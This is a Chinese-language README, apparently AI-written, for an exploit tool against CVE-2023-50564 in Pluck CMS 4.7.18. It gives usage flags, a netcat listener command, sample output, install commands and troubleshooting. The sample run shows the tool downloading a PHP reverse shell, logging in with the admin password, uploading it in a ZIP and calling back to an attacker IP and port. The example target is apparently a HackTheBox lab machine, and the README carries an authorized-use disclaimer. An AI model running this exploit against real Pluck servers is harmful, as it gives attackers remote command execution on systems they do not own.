该脚本利用了 Pluck CMS v4.7.18 中的远程代码执行漏洞。该漏洞允许恶意用户上传恶意 PHP 文件到服务器并执行,从而在目标机器上获得远程命令执行权限。
脚本自动完成整个过程:
注意: 脚本需要在攻击者机器上设置 Netcat 监听器以接收反向 Shell。
在运行脚本之前,请确保:
./CVE-2023-50564 -h <主机> -P <密码> -i <IP> -p <端口>
-h <主机>:目标主机(例如 greenhorn.htb)。-P <密码>:Pluck CMS 管理面板的密码(例如 abcd123)。-i <IP>:攻击者接收反向 Shell 的 IP 地址。-p <端口>:Netcat 监听器运行的端口,用于捕获反向 Shell。./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
设置 Netcat 监听器:在攻击者机器上,在指定端口启动 Netcat 监听器:
nc -nvlp <端口>
例如:
nc -nvlp 9001
运行脚本:向脚本提供所需参数,包括主机、密码、IP 地址和端口。
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
脚本执行:
love.php)的 ZIP 文件。"RCE 在等待你,请前去查看。",脚本在记录所用时间后终止。访问目标:一旦触发了反向 Shell,连接将出现在你的 Netcat 监听器中,使你获得对目标机器的远程访问。
image
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
检测到端口 9001 上的 Netcat 监听器。
正在下载反向 Shell PHP 利用程序...
正在更新: love.php (压缩 60%)
利用程序已压缩为 loverce.zip,原始 PHP 文件已删除。
提取 Cookie: PHPSESSID=somecookievalue
登录成功!
ZIP 文件上传成功。
RCE 在等待你,请前去查看。
脚本终止。总耗时:70 秒。
如果尚未安装 curl 和 netcat,可以使用以下命令安装:
sudo apt update
sudo apt install curl netcat
sudo yum install curl nc
此脚本仅用于教育和授权的渗透测试。未经授权使用此脚本是非法且不道德的。在利用任何系统漏洞之前,请务必获得适当的授权。
504 网关超时:脚本在尝试执行反向 Shell 时可能会遇到此错误,但这不会影响 Shell 执行的成功。该错误通常是由于目标服务器响应 HTTP 请求花费时间过长,但 Shell 仍应正常工作。
Netcat 监听器问题:如果未收到反向 Shell,请确保 IP 地址和端口设置正确,并且没有防火墙限制阻止目标回连到你的机器。
脚本登录失败:如果登录 CMS 管理面板失败,请验证提供的密码是否正确,并确保目标机器上的 CMS 可访问。
如果你需要任何进一步的自定义或对 README 有澄清需求,请告诉我!